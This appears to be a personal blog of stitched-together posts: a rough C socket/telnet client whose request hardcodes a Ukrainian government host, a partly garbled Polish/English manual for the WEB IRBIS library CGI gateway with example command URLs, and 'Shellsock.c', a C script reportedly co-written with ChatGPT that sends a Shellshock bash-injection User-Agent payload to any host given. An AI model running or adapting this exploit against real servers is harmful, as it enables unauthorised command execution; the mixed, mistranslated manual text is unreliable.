VPN termux about China.net

Sunday, 28 May 2023

clang -emit-llvm -o foo.bc -c sip.c -O3 iPhone $ lli foo.bc -t wp.pl 80

 #include <stdio.h>

#include <stdlib.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <unistd.h>

#include <string.h>

#include <arpa/inet.h>

#include <termios.h>

#include <termios.h>

#include <fcntl.h>

 //include<iostream>

#include<stdio.h>                // printf

#include<string.h>                // strlen

//<string>                // string

#include<sys/socket.h>            // socket

#include<arpa/inet.h>            // inet_addr

#include<netdb.h>                // hostenta

#include <unistd.h>

//include<iostream>

#include<sys/socket.h>            // socket

#include<arpa/inet.h>            // inet_addr


struct sockaddr_in server;


   int port = 80;


/*telnet*/

#define IAC 255

#define CMD 0xff

#define DONT 0xfe

#define DO 0xfd

#define WONT 0xfc

#define WILL 0xfb

#define SB 0xfa

#define GA 0xf9

#define EL 0xf8

#define EC 0xf7

#define AYT 0xf6

#define AO 0xf5

#define IP 0xf4

#define BREAK 0xf3

#define SYNCH 0xf2

#define NOP 0xf1

#define SE 0xf0

#define EOR     0xef

#define ABORT 0xee

#define SUSP 0xed

#define xEOF 0xec

/*ftp*/

#define PRELIM 1

#define COMPLETE 2

#define CONTINUE 3

#define TRANSIENT 4

#define ERROR 5

#define RRQ 01

#define WRQ 02

#define DATA 03

#define ACK 04

#define REC_ESC '\377'

#define REC_EOR '\001'

#define REC_EOF '\002'

#define BLK_EOR 0x80

#define BLK_EOF 0x40

#define BLK_ERRORS 0x20

#define BLK_RESTART 0x10 

/* SSH*/

#define SSH_CMD_IAC   255

#define SSH_CMD_CMD   0xff

#define SSH_CMD_DONT  0xfe

#define SSH_CMD_DO    0xfd

#define SSH_CMD_WONT  0xfc

#define SSH_CMD_WILL  0xfb

#define SSH_CMD_SB    0xfa

#define SSH_CMD_GA    0xf9

#define SSH_CMD_EL    0xf8

#define SSH_CMD_EC    0xf7

#define SSH_CMD_AYT   0xf6

#define SSH_CMD_AO    0xf5

#define SSH_CMD_IP    0xf4

#define SSH_CMD_BREAK 0xf3

#define SSH_CMD_SYNCH 0xf2

#define SSH_CMD_NOP   0xf1

#define SSH_CMD_SE    0xf0

#define SSH_CMD_EOR   0xef

#define SSH_CMD_ABORT 0xee

#define SSH_CMD_SUSP  0xed

#define SSH_CMD_EOF   0xec


char *message = {"OPTIONS / HTTP/1.1\r\nHost: exemple.com\r\n\r\n"};


 int nready;

 int maxfd;

  

 int sock;

char buffer[1024];

char head[50]="HEAD / HTTP/1.1\r\n\r\nHost:gov.ua\r\n\r\n";

char option[25]="OPTIONS / HTTP/1.1\r\n";

char xd;

    int bytes_received;

//int numBytesRecv=1;


#define BUFLEN 20

int len;


 unsigned char buf[BUFLEN + 1];


static struct termios tin;


int help(){

printf("-h help\r\n");

printf("-p post\r\n");

printf("-t telnet\r\n");

printf("-<3 heartbled\r\n");

return 0;

}

/*

int hostname_to_ip(char * hostname , char* ip)

{

    struct hostent *he;

    struct in_addr **addr_list;

    int i;

        

    if ( (he = gethostbyname( hostname ) ) == NULL)

    {

        // get the host info

        herror("gethostbyname");

        return 1;

    }


    addr_list = (struct in_addr **) he->h_addr_list;

    

    for(i = 0; addr_list[i] != NULL; i++)

    {

        //Return the first one;

        strcpy(ip , inet_ntoa(*addr_list[i]) );

        return 0;

    }

    

    return 1;

}


*/



int hostname_to_ip(int argc, char *argv) {

    if (argc < 2) {

        fprintf(stderr, "Hostname not provided\n");

        return 0;

    }


    char *hostname = argv;

   

    struct hostent *he;

    struct in_addr **addr_list;

    int i;

        

    if ( (he = gethostbyname( hostname ) ) == NULL)

    {

        // get the host info

        herror("gethostbyname");

        return 1;

    }


    addr_list = (struct in_addr **) he->h_addr_list;

    

    for(i = 0; addr_list[i] != NULL; i++)

    {

        //Return the first one;

        strcpy(argv, inet_ntoa(*addr_list[i]) );

        return 0;

    }

    

    return 1;

}


int telnet (int argc, char*argv[]){

char *hostname;

    char ip[100];


   hostname = argv[2];


hostname_to_ip(argc , ip);


sock = socket(AF_INET, SOCK_STREAM, 0);


server.sin_family = AF_INET;

    

          

       server.sin_addr.s_addr = inet_addr(ip);   

    


   

        port = atoi(argv[3]);

    

           printf("%s resolved to %s" , hostname , ip);

 server.sin_port = htons(port);

     connect(sock, (struct sockaddr *)&server, sizeof(server));        

             struct timeval ts;

    ts.tv_sec = 1; // 1 second

    ts.tv_usec = 0;

    ssize_t numBytesRecv = 0;

      char replyMessage[5500];

         char *replyMessage2[5200];


//sprintf(buffer,head,"host:",argv[1]);

sprintf(buffer, "GET /start.php HTTP/1.1\r\nHost: www.gov.ua\r\n\r\n");


    //(sprintf)(buffer, "HEAD / HTTP/1.1\r\nHost: %s\r\n\r\n", ip); //


//snprintf(buffer, sizeof(buffer), "HEAD / HTTP/1.1\r\nHost: %s \r\n\r\n", ip);


 FILE *fp;

  if ((fp=fopen("test2.html", "w"))==NULL) {

    printf ("can't open file to write\n");

    exit(1); };

  ///  ########################    ///

    

    printf("port is: %d\n", port);

    printf("host ip is %s\n", argv[2]);

    printf("enter the , exemple:/index.aspx\n");


      while(1){

            fd_set fds;

  /* Set up polling. */

 FD_ZERO(&fds);

        if (sock != 0)

            FD_SET(sock, &fds);

        FD_SET(0, &fds);


        // wait for data

        int nready = select(sock + 1, &fds, (fd_set *) 0, (fd_set *) 0, &ts);

        if (nready < 0) {

            perror("select. Error");

            return 1;

        }

        else if (nready == 0) {

            ts.tv_sec = 1; // 1 second

            ts.tv_usec = 0;

        }

        else if (sock != 0 && FD_ISSET(sock, &fds)) {

            // start by reading a single byte

            int rv;

            if ((rv = recv(sock , buf , 1 , 0)) < 0){

      

                return 1;}

            else if (rv == 0) {

        

                printf("Connection closed by the remote end\n\r");

                return 0;

            }


            if (buf[0] == CMD) {

                // read 2 more bytes

                len = recv(sock , buf + 1 , 2 , 0);

            

                if (len  < 0){

    

                    return 1;}

                else if (len == 0) {

          

                    printf("Connection closed by the remote end\n\r");

                    return 0;

                }

                //negotiate(sock, buf, 3);

            }

            else {

                len = 1;

                buf[len] = '\0';

                printf("%s", buf);

                   fprintf(fp,"%s", buf);

                fflush(0);

           //     tcflush(sock, 0);

      

            }

        }

        

        else if (FD_ISSET(0, &fds)) {

            buf[0] = getc(stdin); //fgets(buf, 1, stdin);

            if (send(sock, buf, 1, 0) < 0)

                return 1;

            if (buf[0] == '\n') // with the terminal in raw mode we need to force a LF

                putchar('\r');

        }

    

 } 

    

     

  

    printf("save in test2.html file\n");

       fclose (fp);   

     }




int menu(int argc, char *argv[]) {

    if (argc <1) {

        printf("Usage: %s host port\n", argv[0]);

        return 1;

    }


    char *option = argv[1];


    switch (option[0]) {

        case '-':

            switch (option[1]) {

                case 'h':

                    printf("Help\n");

                    help();

                    break;

                case 'p':

                    printf("post\n");

                    //post();

                    break;

                case 'g':

                    printf("ip\n");

                    break;

                case 't':

                    printf("Telnet\n");


        telnet(argc, argv);


                    break;

                default:

                 printf("Invalidoption\n");

                    break;

            }

            break;

        default:

            printf("Invalid option\n");

            break;

    }


    return 0;

}



int main(int argc, char *argv[])



menu(argc,argv);


return 0;

}

Monday, 15 May 2023

/cgi-bin/irbis64r_91/cgiirbis_64.exe?

 

Skład pliku dystrybucji


Parametr C21COM określa rodzaj operacji, która ma być wykonana na serwerze IRBIS. Poniżej przedstawiam kilka innych możliwych wartości dla tego parametru:

  • A - dodanie postaci hasła do indeksu.
  • B - zamknięcie sesji i wylogowanie użytkownika.
  • C - zapisanie zmian w aktualnym rekordzie.
  • D - usunięcie bieżącej postaci hasła z indeksu.
  • E - wykonanie predefiniowanej procedury.
  • F - wyszukanie rekordów w bazie danych.
  • G - pobranie informacji o statusie połączenia.
  • H - pobranie listy baz danych dostępnych na serwerze.
  • I - pobranie pierwszej dostępnej notki z tekstu.
  • J - pobranie listy postaci hasła z indeksu.
  • K - pobranie wskazanego pola z rekordu.
  • L - pobranie struktury pola z rekordu.
  • M - pobranie maksymalnej długości pola z pliku formata.
  • N - usunięcie rekordu z bazy danych.
  • O - otwarcie nowej sesji na serwerze.
  • P - dodanie rekordu do bazy danych.
  • Q - pobranie sekwencji rekordów.
  • R - reorganizacja bazy danych.
  • S - wyszukanie i pobranie zasobów z serwera.
  • T - pobranie zasobów z serwera.
  • U - zmiana hasła użytkownika.
  • V - wyszukiwanie i pobieranie plików.
  • W - zapisanie rekordu w formacie ISO 2709.
  • X - wyszukanie lub pobranie dostępnego pliku.
  • Y - pobranie całego tekstu z pola rekordu.
  • Z - zwrócenie bieżącego czasu na serwerze

/cgi-bin/irbis64r_91/cgiirbis_64.exe?


WEB IRBIS to aplikacja wykorzystująca bezpośredni dostęp do plików baz danych. W związku z tym uzasadnione jest umieszczenie WEB IRBIS i bazy danych na jednym komputerze. W przypadku IRBIS 64 musi to być komputer, na którym zainstalowany jest serwer IRBIS.

Dystrybucja zawiera kilka plików:

wsetup.exe, borlandmm.dll, unzip32.dll – składniki programu instalacyjnego;

i – plik konfiguracyjny ścieżki instalacji;

webirbis.zip - archiwum głównych plików systemu.

Dzięki zmianie pliku i możliwe jest zainstalowanie komponentów WEB IRBIS w katalogu o dowolnych nazwach. Domyślnie instalacja odbywa się w katalogach, które mają jako przyrostek indeks generacji i numer wersji. Na przykład: irbis64r_91.

[MAIN]

HtdocsPath=irbis64r_91 ścieżka do zasobów statycznych WEB IRBIS (rysunki, pliki Java Script i instrukcje)

CgiPath=irbis64r_91 ścieżka do CGI WEB IRBIS

FramesPath=frames_91 ścieżka do ramek WEB IRBIS względem katalogu DATAI

DepositName=Deposit_91 – ścieżka do plików zasobów technologicznych WEB IRBIS względem katalogu DATAI

ZipFile=WebIrbis.zip – nazwa archiwum instalatora

Generation=64 – generacja WEB IRBIS. Może przyjmować wartości 32 lub 64

ASSEMBLAGE=full - kompilacja WEB IRBIS. W zależności od tego, czy produkt Z39-50 jest dostarczany, parametr może przyjmować wartości full lub opac

Instalacja WEB IRBIS i rozmieszczenie jego komponentów


Podczas instalacji użytkownik będzie musiał wybrać plik INI Readera (dla IRBIS 32) lub plik INI serwera (dla IRBIS 64) oraz określić katalogi CGI, HTTPDOCS.



Rysunek 1


Dodatkowo instalator prosi o podanie adresu serwera i adresu e-mail administratora.



Rysunek 2


Adres serwera musi być podany, ponieważ ta informacja będzie używana we wszystkich odsyłaczach wewnątrz ramek i formatów zamiast dyrektywy <--CGI_PATH-->. W okolicznościach, w których określenie adresu bezwzględnego jest niepożądane, można wpisać w wierszu adresu ukośnik "/". Następnie WEB IRBIS będzie dostępny jako żądanie:

http://localhost/irbis64r_91, jak również na żądanie /irbis64r_91/

Instalator WEB IRBIS tworzy nowe bazy i uzupełnia istniejące rozwiązania technologiczne.

RSUDC jest częścią systemu IRBIS. Domyślnie zawiera kilka nagłówków UDK.

Help - jest w systemie IRBIS. Do dystrybucji WEB IRBIS dołączono specjalnie indeksowaną pełną wersję GRNT.

RDRV nie występuje w systemie IRBIS. Analogiczna baza czytników RDR. Przeznaczony do nagrywania zdalnego czytnika.

LogDB nie jest w systemie IRBIS. Baza danych statystycznych śluzy.

RSBBK jest obecny w systemie IRBIS najnowszych wersji, ale nie zawiera żadnych danych.

MESH – nie występuje w standardowej wersji IRBIS. Domyślnie zawiera kilka nagłówków MESH. W archiwum webirbis te pliki znajdują się w katalogu irbis.

Folder [Katalog serwera CGI]\[Opcja CgiPath instalatora INI] jest głównym katalogiem serwera. Tutaj znajduje się główny plik INI systemu (i lub i), plik komunikatów (WebMSG.txt), plik ze wskaźnikiem błędu (error.html).

Domyślnie foldery [DepositName instalatora INI] i [FramesPath instalatora INI] są tworzone w folderze DATAI, w którym znajdują się bazy danych. Dlatego ponowna instalacja systemu IRBIS polega na skopiowaniu danych i folderów do nowej wersji IRBIS lub ponownej instalacji WEB IRBIS.

Folder [HTDOCS serwera ]\[CgiPath instalatora INI] zawiera dokumentację systemu, rysunki, skrypty i inne pliki pomocnicze.

Pełna wersja IRBIS zawiera klienta i serwer Z39. Klient Z39 jest instalowany w folderze [CgiPath]\Z3950, Z32 serwer w [Katalog główny IRBIS32]\Z3950 lub w katalogu serwera IRBIS (dla IRBIS 64).

Do pracy w przedsprzedaży literatury, zbierania statystyk i rejestracji czytelników brama wymaga praw do zapisu w bazach RQST, RDRV, LOGDB. Aby rejestrować bieżące operacje, brama musi mieć prawo do zapisu w katalogu CGI.

Ogólny przegląd pracy bramy WEB IRBIS


Sekwencję operacji przetwarzania żądania użytkownika można przedstawić w kilku etapach:

Wstępne przetwarzanie

Wykonywanie polecenia użytkownika

Łączenie i przetwarzanie ramek

Pełna sekwencja operacji bramy jest następująca:

Odczytywanie parametrów pliku INI

Wstępne przetwarzanie

Formalna kontrola poprawności parametrów

Interpretacja zapytania wyszukiwania

Autoryzacja

Wykonywanie skryptu ochrony

Ponowna autoryzacja

Wykonywanie wyszukiwania

Tworzenie odpowiedzi

Definiowanie nagłówków HTTP na podstawie pliku INI

Powrót odpowiedzi.

W przypadku wystąpienia błędu wykonania lub przekroczenia czasu przetwarzania żądania, brama zwraca błąd (error.html)

Wstępne przetwarzanie WEB IRBIS


Ochrona skryptów


Format skryptu zabezpieczającego spełnia dwie funkcje: 1) weryfikacja parametrów wejściowych żądania i ochrona przed włamaniem 2) przetwarzanie i uzupełnianie parametrów.

Pierwsza linia utworzona przez format script-ochrony określa ogólny wynik — jeśli jest to 0 lub plik nie zwrócił żadnych wartości — skrypt ochrony wykrył błąd, jeśli wynik 1 lub plik zwrócił inne wartości niezerowe — błąd nie istnieje. W pierwszym przypadku brama zwraca error.html, w drugim przypadku brama odczytuje 


Preprocessing WEB IRBIS


Script protection.


The security script format performs two functions: 1) checking the incoming request parameters and protecting against hacking 2) processing and supplementing parameters.


The first line generated by the script protection format determines the overall result - if it is 0 or the file did not return any values - the security script detected an error, if result 1 or the file returned other non-zero values - there is no error. In the first case, the gateway returns error.html, in the latter case, the gateway reads the remaining lines of the format and changes the query parameters to new ones.


For example, the string 'SCRIPT_DONE=YES'/ sets the SCRIPT_DONE parameter to YES.


User authorization


Authorization allows you to order literature, view the form and edit the order basket.


The RDR database is used for authorization. Authorization occurs by identifier and, if the user request is set to Z21FLAGID=1, by last name. After authorization, the gateway encrypts the identifier and the encrypted identifier is transmitted when navigating through the pages.


WEB IRBIS teams


Principles of execution of WEB IRBIS commands


The current WEB IRBIS command is set by the value of the C21COM parameter. The given command usually reads a sequence of frames from the [value of the I21DBN parameter] section of the INI WEB IRBIS file. But it is also possible to output an arbitrary frame, the name of which is specified in the S21FRAME parameter using the arbitrary base specified in the I21DBN parameter.


Below is a list of matching the command and the parameter that determines the sequence of frames. In parentheses - the value of C21COM.


ShowFrames - "show" (F) command.


SearchFrames - command to execute and display search results - "search" (S).


DictionryFrames - dictionary terms show command - "dictionary" (T).


ZakazFrames - order basket selection team - "order" (Z)


RecUpdateFrames - record editing command - "record" (R)


Commands for uploading records - "export"(E), reading an external file - "file" (2), borrowing a record - "downloading" (4), uploading a binary object - "integrated file" (3), remote search "number of found" (G) do not require specifying a sequence of frames, as the gateway outputs a non-


It is important to note that in all cases, WEB IRBIS can execute only one command at a time.


HTML page output command - "show" (F)


The F command is usually used to display search forms and, as a rule, it involves only the main parameters: C21COM, I21DBN, P21DBN, Z21DBN. But if there is a request (S21ALL), it works completely similarly to the S command


Example of a query to display an advanced search page:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? C21COM=F&I21DBN=IBIS_EX&P21DBN=IBIS


Sample code forming the request: dbname.frm


Search command - "search"(S)


The S command is usually used to display search results. It can simultaneously use dictionary search, sequential search (by elements that are not indexed) and full-text search with ranking.


The dictionary search job is usually formed from a set of named parameters *S21P***


*S21STR - search element;


*S21LOG - the logic of combining words from the search element with each other;


*S21P01 - a way to split the S21STR search element;


*S21P02 - the need to use right truncation;


*S21P03 - dictionary prefix;


*S21P04 - qualifier;


*S21P05 - not used


*S21P06, S21P07 - search boundaries by dictionary term range


Example of a search query, by keyword "history"


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? I21DBN=IBIS&P21DBN=IBIS&S21STN=1&S21REF=3&S21FMT=fullwebr&C21COM=S&S21CNR=20&S21P01=0&S21P02=0&S21LOG=1&S21P03=K=


Sample code forming the request: fullwebr.pft


Already in the security script, the search query specified in this way is converted to the IRBIS query and is available in a virtual field corresponding to the S21ALL parameter (default 2226).


If both *S21** and S21ALL parameters are in the query, they are combined by logic defined by S21LOG.


Sequential search is set by parameters (default labels are indicated in parentheses):


S21SCAN_FULL - determines the need for a full database scan.


S21SCAN(1013) - defines a file with a search format


Example of a search query for a sequential search in the RQST database using the basket format:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? C21COM=S&I21DBN=RQST&S21SCAN=basket&S21SCAN_FULL=1&S21FMT=RQST_WEB&Z21ID=4444&P21DBN=IBIS


Sample code forming the request: author_3.frm


If you have a dictionary search query, install S21SCAN_FULL=0 and specify the S21SCAN value, the dictionary is first searched and then a sequential search is performed.


Full-text search is determined by two main parameters (default labels are indicated in parentheses):


FT_REQUEST(3335) - request in any form


FT_PREFIX(3337) - dictionary prefix


Example of a full-text search query for the phrase "history of Russia"


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? C21COM=S&I21DBN=IBIS&P21DBN=IBIS&S21STN=1&S21CNR=20&FT_REQUEST=history of Russia&FT_PREFIX=K=


When combining dictionary search and full-text search, full-text search is performed first, and dictionary search and sequential search are used to refine the results.


A more detailed description of all search parameters is given in Appendix 1.


The command for showing dictionary terms is "dictionary" (T)


The T command displays a range of dictionary terms and formats them according to the format (default is web_dic.pft). In this case, the following parameters are applied:


T21TRM(2229) - initial dictionary term


T21PRF(2228) - dictionary prefix


T21CNR(1012) - number of dictionary terms displayed


If there is an S21ALL request, only terms related to documents found on S21ALL's request are displayed.


Example of a request to output 20 dictionary terms starting with the letter A:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? C21COM=T&I21DBN=IBIS_EX&P21DBN=IBIS&T21TRM=A&T21PRF=K=&T21CNR=20


Sample code generating the request: alfabet.pft


Pre-order command - "order" (Z)


Pre-orders for books are formed by WEB IRBIS in the same way as ARM Reader. Orders are reflected in the Book Distribution workstation and can be deleted by the WEB IRBIS user through the "Order Basket" mode (in the form of authorization).


Example of a request for a pre-order of literature:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? Z21ID=1&P21DBN=IBIS&I21DBN=IBIS_ZAKAZ&C21COM=Z&Z21MFN=58


Command for changing records - "record" (R)


The basic package entry command is used only to register users in the RDRV database. It is performed only with authorization. In case of unauthorized access or other problems, the command returns an error in the field defined by the RecUpdateResultTag parameter (default 1101)


The following parameters are used for recording:


RN_R21MFN - record number


RN_R21NUMXX - field label


RN_R21SUBXX_YY is a subfield separator (Latin letter). Optional parameter (Obt)


RN_R21VOLXX_YY - subfield value


The command allows you to perform operations with several records of the same database at the same time. Command groups for each record must have a common prefiction(RI_), but if the work is performed with only one record, the prefix may not be used. Each record is set of changeable field and subfield labels (if any). A group of parameters associated with one field label in the database must have a common ordinal suffix (XX). The group of parameters that define the label and content of the subfield must have a secondary ordinal suffix (YY). When setting the entire field, it's always 1. If you skip the next ordinal suffix (for example, 10 - 12...), the system interrupts reading the parameters. That is, the R21NUM... parameters list the fields in strict order - from 1 to N, where N is the ordinal number of the last field. There may be no field values.


Example of a request to create a new record and add XXXXX to 1000 lines:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? C21COM=R&P21DBN=IBIS&I21DBN=IBIS_REC&Z21ID=444&R21MFN=0&R21NUM1=1000&R21VOL1=XXXXX


Sample code generating the request: Reg.frm


Upload command - "export" (E)


The export command involves authorization and setting permission for the IP address of the borrower in the database section.


Export is carried out for many records found by the search query. Therefore, the entire syntax of the "Search"(S) command is fully applicable for this mode. But this command also uses specific parameters that determine the presentation of the result:


EXP21FMT - record view (can take values: ISO or TEXT)


EXP21CODE - output encoding (can take values: UTF-8, WIN, DOS)


EXP21FST - reformatting table (value - FST file)


It is extremely important that when exporting to ISO 2709 format, all fields with a label greater than 999 are transferred to the 998 field. This is due to the fact that this format does not support four-digit labels.


Example of a command to export the first 20 records found on request <. >K=history of Russia<.> in text representation, UTF8 encoding and IRBIS format:


Http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe? I21DBN=IBIS&P21DBN=IBIS&S21STN=1&C21COM=E&S21CNR=20&S21ALL=(<. >K=history of Russia<. >)&EXP21FMT=TEXT


Write borrowing command - "download" (4)


The command is used to borrow entries in the Directory workstation. Like the export command, it involves authorization and permission to borrow in the section of the INI file corresponding to the desired database. In addition, the download link is generated only on the basis of field 112 of the authorized reader record, where masks or specific IPs of valid clients should also be listed.


The command has the same rules and the same parameters as the export command, but there is also one original parameter:


EXP21MFN - number of the downloaded record.


With this command, only one record can be uploaded.


Example of a command to unload record No. 100 in ISO representation and UTF8 encoding:…


Przykład polecenia eksportu pierwszych 20 rekordów znalezionych przez zapytanie <.>K=historia Rosji<.> w reprezentacji tekstowej, kodowanie formatu UTF8 i IRBIS:
http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe?I21DBN=IBIS&P21DBN=IBIS&S21STN=1&C21COM=E&S21CNR=20&S21ALL=(<.>K=identyfikacja Rosji<.>)&EXP21FMT=TEKST
Polecenie wypożyczenia rekordu - „pobierz” (4)
Polecenie służy do wypożyczania rekordów w AWP Cataloger. Podobnie jak polecenie export, ona zakłada autoryzację i pozwolenie na wypożyczenie w sekcji pliku INI odpowiadającej żądanej bazie. Ponadto link do pobrania jest generowany tylko na podstawie pola 112 rekordu autoryzowanego czytelnika, w którym należy również podać maski lub maski konkretnych adresów IP ważnych klientów.
Polecenie ma te same reguły i te same parametry co polecenie export, ale jest też jeden oryginalny parametr:
EXP21MFN to numer pobieranego rekordu.
Za pomocą tego polecenia można usunąć tylko jeden rekord.
Przykładowe komendy do wgrania rekordu nr 100 w reprezentacji ISO i kodowaniu UTF8:
http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe?I21DBN=IBIS&P21DBN=IBIS&C21COM=4&EXP21MFN=100&EXP21FMT=ISO
Polecenie odczytu pliku zewnętrznego - "plik"(2)
Polecenie odczytu zasobów zewnętrznych służy do pobierania plików, do których odwołuje się pole 9 51.
Polecenie wykorzystuje parametry:
IMAGE_FILE_NAME - pełna lub względna ścieżka do pliku;
IMAGE_FILE_MFN – numer rekordu, jeśli plik znajduje się w pełnotekstowym archiwum bazy danych;
IMAGE_FILE_DOWNLOAD - flaga, która zmusza przeglądarkę do nie otwierania pobranego pliku, ale do wywołania okna dialogowego z sugestią otwarcia lub zapisania go na dysku. Wartość domyślna to 0.
Do przesyłania plików HTML ze zdjęciami używany jest plik korespondencji adresów lokalnych i sieciowych do plików u
Parametr IMAGE_FILE_NAME może zawierać nazwy plików pełne adresów względnych lub. Jednak używanie absolutnie dowolnych adresów jest niebezpieczne, ponieważ umożliwia przesyłanie dowolnych plików z serwera. Dlatego zdecydowanie zaleca się ograniczenie ich możliwego zasięgu poprzez ustawienie parametru Safe_File_Download=1 i każdorazowo pobierać pliki z parametrami Safe_File_Paths w pliku INI WEB IRBIS.
na przykładzie:
Safe_File_Download=1
Safe_File_Paths=C:\irbis\datai\books\files;C:\web\images\
Jeśli parametr IMAGE_FILE_NAME określa względną ścieżkę lub nazwę pliku, zostanie do niego dodana niezbędna © ścieżka z Safe_File_Paths. Możesz to zrobić, zmienić z Safe_File_Paths.
Przykładowe wersje oprogramowania nr 100 w formacie ISO i kodery UTF-8:
http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe?Z21ID=4444&P21DBN=IBIS&I21DBN=IBIS&C21COM=2&IMAGE_FILE_NAME=image.jpg&IMAGE_FILE_DOWNLOAD=1
Przykładowy kod generujący żądanie przesłania pliku: fullwebr.pft
Polecenie odczytu wewnętrznego obiektu binarnego z rekordu bibliograficznego - "plik zintegrowany"(3)
Polecenie wyświetlenia wewnętrznych zasobów binarnych rekordu bibliograficznego działa tylko w IRBIS 64. Wykorzystuje następujące parametry:
BINARY_RESOURCE_MFN - numer zapisany
BINARY_RESOURCE_OCC - nazwa użytkownika
Przykład rozładowania zasobu wewnętrznego rekordu #100 z powtórzenia 1
http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe?C21COM=3&I21DBN=IBIS&P21DBN=IBIS&BINARY_RESOURCE_OCC=1&BINARY_RESOURCE_MFN=100
Polecenie do pobrania liczby dokumentów znalezionych w zdalnej bazie danych to „liczba znalezionych” (G)
Polecenie służy do wyszukiwania rozproszonego w korporacji IRBIS. W swojej składni jest całkowicie podobny do polecenia S, ale zwraca brak znalezionych rekordów, a jedynie ciąg WYNIK=[liczba znalezionych rekordów]. Można go używać w formatach, w funkcji &unifor('+3G[zdalne zapytanie do bazy danych]'), która ułatwia znalezienie liczby znalezionych rekordów i wyświetlenie ich w formacie lub ramce.
Przykład zapytania dla słowa kluczowego „historia”:
http://127.0.0.1/cgi-bin/irbis64r_91/cgiirbis_64.exe?I21DBN=IBIS&P21DBN=IBIS&C21COM=G&S21ALL=<.>K=instalacja<.>

https://gigabaza.ru/doc/52043.html


Saturday, 13 May 2023

Shellsock.c

// write by Chat openAi and Adam

//clang -emit-llvm -o foo.bc -c shellsock.c -O3

//lli foo.bc exemple.com 80

 #include <stdio.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netdb.h>

#include <string.h>

#include <unistd.h>

#include <stdlib.h>


int main(int argc, char *argv[])

{

    int sockfd, portno, n;

    struct sockaddr_in serv_addr;

    struct hostent *server;


    char buffer[1024];

    char *get = "GET / HTTP/1.1\r\n\r\nUser-Agent: () { :; }; /bin/bash -c 'echo Vulnerable'\r\n\r\n";

    char *user_agent = "User-Agent: () { :; }; /bin/bash -c 'echo Vulnerable'";

    if (argc < 2) {

        fprintf(stderr,"Usage: %s hostname port\n", argv[0]);

        exit(0);

    }

    portno = atoi(argv[2]);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    if (sockfd < 0) {

        perror("ERROR opening socket");

        exit(1);

    }

    server = gethostbyname(argv[1]);

    if (server == NULL) {

        fprintf(stderr,"ERROR, no such host\n");

        exit(0);

    }

    memset(&serv_addr, 0, sizeof(serv_addr));

    serv_addr.sin_family = AF_INET;

    serv_addr.sin_port = htons(portno);

    memcpy(&serv_addr.sin_addr.s_addr, server->h_addr, server->h_length);

    if (connect(sockfd,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0) {

        perror("ERROR connecting");

        exit(1);

    }

    bzero(buffer,1024);

    //snprintf(buffer, sizeof(buffer), "GET / HTTP/1.1\r\n%s\r\n\r\n", user_agent);

    n = write(sockfd, get, strlen(get));

    if (n < 0) {

        perror("ERROR writing to socket");

        exit(1);

    }

    bzero(buffer,1024);

    n = read(sockfd, buffer, 1023);

    if (n < 0) {

        perror("ERROR reading from socket");

        exit(1);

    }

    printf("%s\n",buffer);

    close(sockfd);

    return 0;

}


Friday, 21 April 2023

CLANG

 clang -emit-llvm -o foo.bc -c foo.c -O3

lil foo.bc

clang -o foo foo.bc -O3